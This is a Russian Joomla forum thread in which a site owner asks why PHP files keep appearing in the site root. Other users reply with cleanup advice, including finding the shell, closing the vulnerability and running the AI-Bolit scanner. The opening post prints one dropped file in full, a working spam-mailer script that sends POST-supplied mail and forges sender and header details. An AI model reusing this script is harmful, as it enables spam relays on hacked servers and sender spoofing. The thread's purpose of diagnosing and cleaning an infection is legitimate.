Генерация php файлов в корень сайта

Mangoz

Осваиваюсь на форуме
12
0 / 0

Генерация php файлов в корень сайта

« : 02.10.2014, 07:06:31 »

Помогите найти очаг вируса. Не могу найти, что генерирует эти файлы в корень сайта. Каким-то образом при переходе по ссылкам сайта меня кидает на сайты буржуйских социалок или фармы. Файлы появляются стабильно 3-4 раза за сутки, после того как их удалишь.

Код одного из файла

Код

<?php

function getDomainFromEmail($email)
{
$domain = substr(strrchr($email, "@"), 1);
return $domain;
}

function random_string($length) {
    $key = '';
    $keys = range('a', 'z');

    for ($i = 0; $i < $length; $i++) {
        $key .= $keys[array_rand($keys)];
    }

    return $key . '.php';
}

if(isset($_POST["to_address"]))
        $to = $_POST["to_address"];
else
	{
	echo "404 error";
	exit;
	}

$subject = stripslashes($_POST["subject"]);
$message = stripslashes($_POST["body"]);

set_time_limit (60);
@ignore_user_abort (true);

$to_ar = explode(',', $to);




if(isset($_POST["from_address"]))
{

$from_address = stripslashes($_POST["from_address"]);
$from_name = stripslashes($_POST["from_name"]);

if(isset($_POST["use_local_domain"]))
{
         $l_domain = gethostname();
         
         $splitPos = strpos($l_domain, "www.");
         if ($splitPos !== false) {
         $l_domain = str_replace('www.', '', $l_domain);
          }

         $from_address = substr($from_address,  0, strpos($from_address, '@')). '@' . $l_domain;
}


//$header =  "MIME-Version: 1.0\r\n";
//$header .= "Content-type: text/plain; charset=iso-8859-1\r\n";
//$header .= 'From: ' . '"' . $from_name . '"' .  " <" . $from_address . ">\r\n";
//$header .= "Reply-To: $from_address\r\n";
//$header .= "Return-Path: $from_address\r\n";
//$header .= "X-Mailer: PHP/" . phpversion(). "\r\n" ;

$domain = getDomainFromEmail($email);
$randIP = "".mt_rand(0,255).".".mt_rand(0,255).".".mt_rand(0,255).".".mt_rand(0,255);

$from_format = $from_name." <".$from_address.">";

 $header = "Message-Id: <".md5(uniqid(rand())).".".preg_replace("/[^a-z0-9]/i", "", $from_format)."@{$domain}>\r\n";
 $header.= "From: {$from_format}\r\n";
 $header.= "To: {$to}\r\n";
 $header .= "Reply-To: $from_address\r\n";
 $header .= "Return-Path: $from_address\r\n";
// $header.= "Subject: {$subject}\r\n";
 $header.= "Date: ".date("r")."\r\n";
 $header.= "Content-Type: text/plain; charset=iso-8859-1\r\n";
 $header.= "X-Priority: 3\r\n";
 $header.= "X-MSMail-Priority: Normal\r\n";
 $header.= "X-Mailer: PHP - " .phpversion()."\r\n";
 $header.= "X-PHP-Script: ". rand(0,500).":". random_string(rand(3,13)). " for " . $randIP ."\r\n"; 
// $header.= "\r\n";
// $header.= $message;
// $header.= "\r\n.\r\n";




$result = mail(stripslashes($to), stripslashes($subject), stripslashes($message), stripslashes($header));
}
else
{
$result = mail(stripslashes($to), stripslashes($subject), stripslashes($message));
}

if($result){echo 'good';}else{echo 'error : '.$result;}
 
?>

Записан

flyingspook

Живу я здесь
3590
247 / 9

Re: Генерация php файлов в корень сайта

« Ответ #1 : 02.10.2014, 11:00:49 »

ищите и удаляйте shell, закрывайте уязвимости сайта, это не генерирует а подгружают

Записан

ЛЕЧИМ САЙТЫ ОТ ВИРУСОВ и Shell! & НОВЫЙ СКАНЕР ПОИСКА Shell and BackDoor
Сканер поиска Shell and BackDoor
Отличный хостинг для Ваших сайтов. Настраиваем сервера.

wishlight

Живу я здесь
4980
293 / 1
от 150 руб быстрый хостинг без блокировок

Re: Генерация php файлов в корень сайта

« Ответ #2 : 02.10.2014, 11:13:38 »

Да. Кто-то развлекается.

Записан

Дедик, VDS, бекап по смешным ценам|Мои VDS быстрее твоих|Надежные VDS(скидка 10% ovz WPCLMX6YWG kvm 7SIHW75O9Q)|Хостинг против взломов|Решаю ваши проблемы.
Лечу от вирусов и хостинг
Защита сайтов и логи взломов

robert

Живу я здесь
4974
457 / 20

Re: Генерация php файлов в корень сайта

« Ответ #3 : 02.10.2014, 11:14:35 »

Приведенный вами код рассылает спам от вашего имени.

Записан

Не будь паразитом, сделай что-нибудь самостоятельно!

Mangoz

Осваиваюсь на форуме
12
0 / 0

Re: Генерация php файлов в корень сайта

« Ответ #4 : 02.10.2014, 11:54:45 »

В каких файлах может находиться уязвимость?

Записан

wishlight

Живу я здесь
4980
293 / 1
от 150 руб быстрый хостинг без блокировок

Re: Генерация php файлов в корень сайта

« Ответ #5 : 02.10.2014, 14:03:57 »

В общем в самых разнообразных вкратце. Мы же не знаем, что у вас установлено и сколько сайтов на аккаунте.

Записан

Дедик, VDS, бекап по смешным ценам|Мои VDS быстрее твоих|Надежные VDS(скидка 10% ovz WPCLMX6YWG kvm 7SIHW75O9Q)|Хостинг против взломов|Решаю ваши проблемы.
Лечу от вирусов и хостинг
Защита сайтов и логи взломов

flyingspook

Живу я здесь
3590
247 / 9

Re: Генерация php файлов в корень сайта

« Ответ #6 : 02.10.2014, 20:30:02 »

Цитата: Mangoz от 02.10.2014, 11:54:45

В каких файлах может находиться уязвимость?

в любом

Записан

ЛЕЧИМ САЙТЫ ОТ ВИРУСОВ и Shell! & НОВЫЙ СКАНЕР ПОИСКА Shell and BackDoor
Сканер поиска Shell and BackDoor
Отличный хостинг для Ваших сайтов. Настраиваем сервера.

Taatshi

Глобальный модератор
5258
481 / 2
Верстаем и кодим. Обращайтесь ;)

Re: Генерация php файлов в корень сайта

« Ответ #7 : 03.10.2014, 08:23:43 »

Mangoz, если Вы не знакомы хотя бы с основами php - Вам самому это дело не осилить. У меня порой занимает пару-тройку дней чтобы найти уязвимость, полностью очистить сайт и поставить хотя бы базовую защиту.

Но можете попробовать. Воспользуйтесь скриптом айболит - на сегодняшний день это один из самых эффективных инструментов для работы.

Записан

ВЕРСТКА, САЙТЫ ПОД КЛЮЧ, УДАЛЕНИЕ ВИРУСОВ, МИГРАЦИЯ НА JOOMLA 3, ОБНОВЛЕНИЕ | ОТЗЫВЫ
Связь: telegram - Taatshi, почта - Taatshi на яндексе, Skype - Taatshi

Чем лучше всего делать резервные копии сайта? Автор 7Azimuth	Ответов: 115 Просмотров: 51641	29.11.2023, 14:41:12 от sivers
Joomla 1.5 как убрать кнопку редактировать материант с сайта Автор andriy465	Ответов: 5 Просмотров: 1856	12.11.2023, 23:37:03 от all_zer
Не могу распаковать jpa архив сайта Akeeba backup. ajax error Автор smadkz	Ответов: 4 Просмотров: 1188	26.12.2020, 15:15:15 от stendapuss
Версия сайта для слабовидящих Автор nikos	Ответов: 22 Просмотров: 42809	27.11.2020, 11:04:18 от chernobyl
Поиск статьи по url сайта в админке Joomla 1.5 Автор Tema	Ответов: 5 Просмотров: 1285	14.08.2020, 07:16:44 от rsn

Генерация php файлов в корень сайта - Joomla 1.5: Общие вопросы

Новости Joomla

Вышли релизы Joomla 5.1.0 и Joomla 4.4.4

Проблема с id в URL материалов Joomla при обновлении большого старого сайта до Joomla 5

Используем поля Joomla для фильтрации материалов

Mangoz

Генерация php файлов в корень сайта

flyingspook

Re: Генерация php файлов в корень сайта

wishlight

Re: Генерация php файлов в корень сайта

robert

Re: Генерация php файлов в корень сайта

Mangoz

Re: Генерация php файлов в корень сайта

wishlight

Re: Генерация php файлов в корень сайта

flyingspook

Re: Генерация php файлов в корень сайта

Taatshi

Re: Генерация php файлов в корень сайта

Похожие темы